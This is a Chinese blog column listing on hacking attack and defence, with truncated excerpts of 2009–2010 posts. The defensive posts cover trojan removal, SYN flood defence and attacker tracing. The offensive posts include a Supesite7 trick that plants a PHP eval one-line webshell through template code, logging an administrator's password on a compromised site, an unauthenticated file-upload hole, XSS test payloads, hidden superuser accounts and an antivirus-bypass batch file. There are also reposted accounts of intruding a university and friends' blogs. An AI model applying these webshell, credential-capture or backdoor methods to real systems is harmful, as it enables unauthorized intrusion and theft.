
黑客攻防
文章平均质量分 73
xuehu808
这个作者很懒,什么都没留下…
展开
-
快速清除系统中的木马病毒
黑客入侵后要做的事就是上传木马后门,为了能够让上传的木马不被发现,他们会想尽种种方法对其进行伪装。而作为被害者,我们又该如何识破伪装,将系统中的木马统统清除掉呢! 一、文件捆绑检测 将木马捆绑在正常程序中,一直是木马伪装攻击的一种常用手段。下面我们就看看如何才能检测出文件中捆绑的木马。 1.MT捆绑克星 文件中只要捆绑了木马,那么其文件头特征码一定会表现出一定的规律,而MT...原创 2009-10-06 14:13:49 · 260 阅读 · 0 评论 -
Supesite7后台拿shell方法
方法:编辑模板的时候写入这几行,拆开写一句话,就行了. <!--{eval $content = "@eval(\$_POST[c])";}--> <!--{eval $test1 = "<"."?"."php ".$content."?>";}--> <!--{eval fputs(fopen(S_ROOT2010-03-01 01:31:48 · 290 阅读 · 0 评论 -
asp记录管理员账号密码
在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性。下载了数据库,但是md5密码没办法解密。唉,看来只要记录他的登录管理员 账号密码了!省得还要去穷取法破解!这个密码其实说重要也不重要 说不 重要 其实很重要。因为很多人喜欢使用相同密码。即使是我这类安全检测人员,也免不了使用同一种账号密码的习惯。首先看看他的后台登陆代码&l...2010-03-01 01:30:45 · 471 阅读 · 0 评论 -
711企业网站管理程序V6.0再爆上传漏洞及利用
前些天出了个Cookies注入漏洞,今天又翻了看了下~ 在ADMIN目录有2个上传文件upfile.asp和upfile2.asp 这2个组件的功能就是:无需登录后台,无需截包,直接本地修改代码就能上传asp文件,无语中。。。。 另外,更可爱的是写这套程序的还为我们编写一套可用万能密码直接登录的后台。据谷歌报道,存在此套系统的用户多达1,050,000 。继续无语中。。。 ...原创 2010-03-01 01:28:44 · 321 阅读 · 0 评论 -
blogbus.com(博客大巴)XSS跨站漏洞
漏洞测试过程: 1.申请了一个帐号 2.进入后台--博客--模板--首页布局设置--文章内容[编辑] 3.在对话框中的编辑链接处加上跨站代码或进入文章发布 切换编辑器至HTML模式 4.测试代码 <script>alert(/http://hi.baidu.com/5427518/)</script> <iframe src=http://hi.bai...2010-03-01 01:25:45 · 391 阅读 · 0 评论 -
webshell
百科名片顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。 产品及服务 一方面,webshell可以被站长常常用于网站管理、服务器管理等等。 根...2010-02-23 14:27:26 · 180 阅读 · 0 评论 -
防范黑客入住系统建立隐藏帐户
面对黑客在自已的电脑中建立一个隐藏的账户,用户应该怎么办?虽然账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在。其实只要用户细心观察做到以下几点,即能发现其中的奥妙。 把“隐藏账户”请出系统 隐藏账户的危害可谓十分巨大。因此我们有必要对防范技术作一个了解,把隐藏账户彻底请出系统 1、添加“$”符号型隐藏账户 对于这类隐藏账户的检测比较简单。一般黑客在利用这种方法建立完隐藏账户后...原创 2010-01-19 10:21:46 · 224 阅读 · 0 评论 -
想过主动哟
一、改字符串系统芯片----我爱的心物理内存---智脑内心 Windows版本----xiaojun型号Windows目录----xiaojun路径注册公司-----我的女人注册用户---我的玫瑰------------------------主动特征码:0009F4E3_00000002当前用户----现在的你当前日期----现在日子开机时间----恋爱时候计算机名称---我的爱人是窗口分辨...原创 2010-01-02 17:49:43 · 124 阅读 · 0 评论 -
利用google对特定站点进行测试的实现
利用google照样可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。 ------------------------------------------------首先用google先看这个站点的一些基本情况(一些细节部分就略去了): site:xxxx.com 从返回的信息中,找到几个该校的几个系院的域名: http//a1.xxxx.comhttp//a2....2010-03-18 23:12:15 · 264 阅读 · 0 评论 -
[转载]入侵复旦大学
此文章已发表在《黑客X档案》第6期杂志上后经本文作者hackest提交到HST技术论坛欢迎大家转载,但请务必要记住注明此信息! 一、师出有名某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起看看了,嘿嘿。这次跑去黑复旦纯粹是为了练习技术。二、战略部署这次要拿的是复旦...2010-03-09 23:17:43 · 220 阅读 · 0 评论 -
15款最好的Windows系统安全检测工具
你想测试你的Widnows系统的安全性吗? 如果你选对了工具,其实这是一件非常有趣的工作。如果你正为挑选合适的工具而苦恼,那就让本文给你一些帮助吧。 关于安全测试工具,我发现大体上你都能购买到。然而,还有一些是免费的工具,没有这些工具我会举步维艰,所以我将两种类型的工具一同与你分享。 基于Widnows平台的电脑,有7类常见的安全测试工具,它们是: 1. 端口扫描 (Port s...2010-03-09 23:04:07 · 591 阅读 · 0 评论 -
系统中多种隐藏超级用户方法
一、如何在图形界面建立隐藏的超级用户 图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为Windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit...2010-03-09 23:00:54 · 157 阅读 · 0 评论 -
追捕技术:让黑客无处可逃[转载]
网络是个大舞台,这个舞台中不光有安全人员也有黑客份子所组成。芳击与防守自然就成了两者之间相互论辩的话题。对于一些重要的部门,一旦网络遭到攻击,如何追踪网络攻击,追查到攻击者并将其绳之以法,是十分必要的。下面的文章分本地追踪和网络追踪两部份。 本地追踪方法 追踪网络攻击就是找到事件发生的源头。它有两个方面意义:一是指发现IP地址、MAC地址或是认证的主机名;二是指确定攻击者的身份。网络攻...2010-03-06 21:24:04 · 220 阅读 · 0 评论 -
玩黑朋友的博客
1. http://w0w.cz.cc/read.php/40.htm#entrymore 2. 友情检测中国红客联盟webshell并提权 http://www.nhs8.com/post/1532.html 3. http://www.enterer.cn/ 4. 过瑞星主动的批处理,比较恶毒http://www.darkst.com/b...2010-03-05 18:09:15 · 148 阅读 · 0 评论 -
黑客教你怎样用Excel剿灭DLL木马
DLL木马是依靠DLL文件来作恶的,木马运行时不会在进程列表出现新的进程,而且很多DLL木马还插入到系统关键进程中(无法终止),即使能被杀毒软件检测出来也无法查杀,这给系统安全带来极大的威胁。如果你的手头没有趁手的杀马兵器,抄起办公的Excel我们也可以肉搏一番。下面就看看我们是如何用Excel对付这种插入lsass.exe进程的木马吧! 第一步:查找被感染的进程 近日开机上网一段时间...原创 2009-10-06 14:49:26 · 174 阅读 · 0 评论 -
SYN攻击基本原理与防范技术
据统计,在所有黑客攻击事件中,SYN攻击是最常见又最容易被利用的一种攻击手法。相信很多人还记得2000年YAHOO网站遭受的攻击事例,当时黑客利用的就是简单而有效的SYN攻击,有些网络蠕虫病毒配合SYN攻击造成更大的破坏。本文介绍SYN攻击的基本原理、工具及检测方法,并全面探讨SYN攻击防范技术。 一、TCP握手协议 在TCP/IP协议中,TCP协议提供可靠的连接服务,采用三次握手建立...原创 2009-10-06 14:46:25 · 487 阅读 · 0 评论 -
识破欺骗 教你简单方法查找黑客老巢
网络安全是一个综合的、复杂的工程,任何网络安全措施都不能保证万无一失。因此,对于一些重要的部门,一旦网络遭到攻击,如何追踪网络攻击,追查到攻击者并将其绳之以法,是十分必要的。 追踪网络攻击就是找到事件发生的源头。它有两个方面意义:一是指发现IP地址、MAC地址或是认证的主机名;二是指确定攻击者的身份。网络攻击者在实施攻击之时或之后,必然会留下一些蛛丝马迹,如登录的纪录,文件权限的改变等虚拟证...原创 2009-10-06 14:17:30 · 258 阅读 · 0 评论 -
Sablog-X v2.x 任意变量覆盖漏洞
Sablog-X v2.x 任意变量覆盖漏洞author: 80vul-Bteam:http://www.80vul.com一 描叙:由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞,导致可以利用extract()来覆盖任意变量,最终导致xss、sql注射、代码执行等很多严重的安全漏洞。二 分析commo...2010-03-02 09:44:47 · 330 阅读 · 0 评论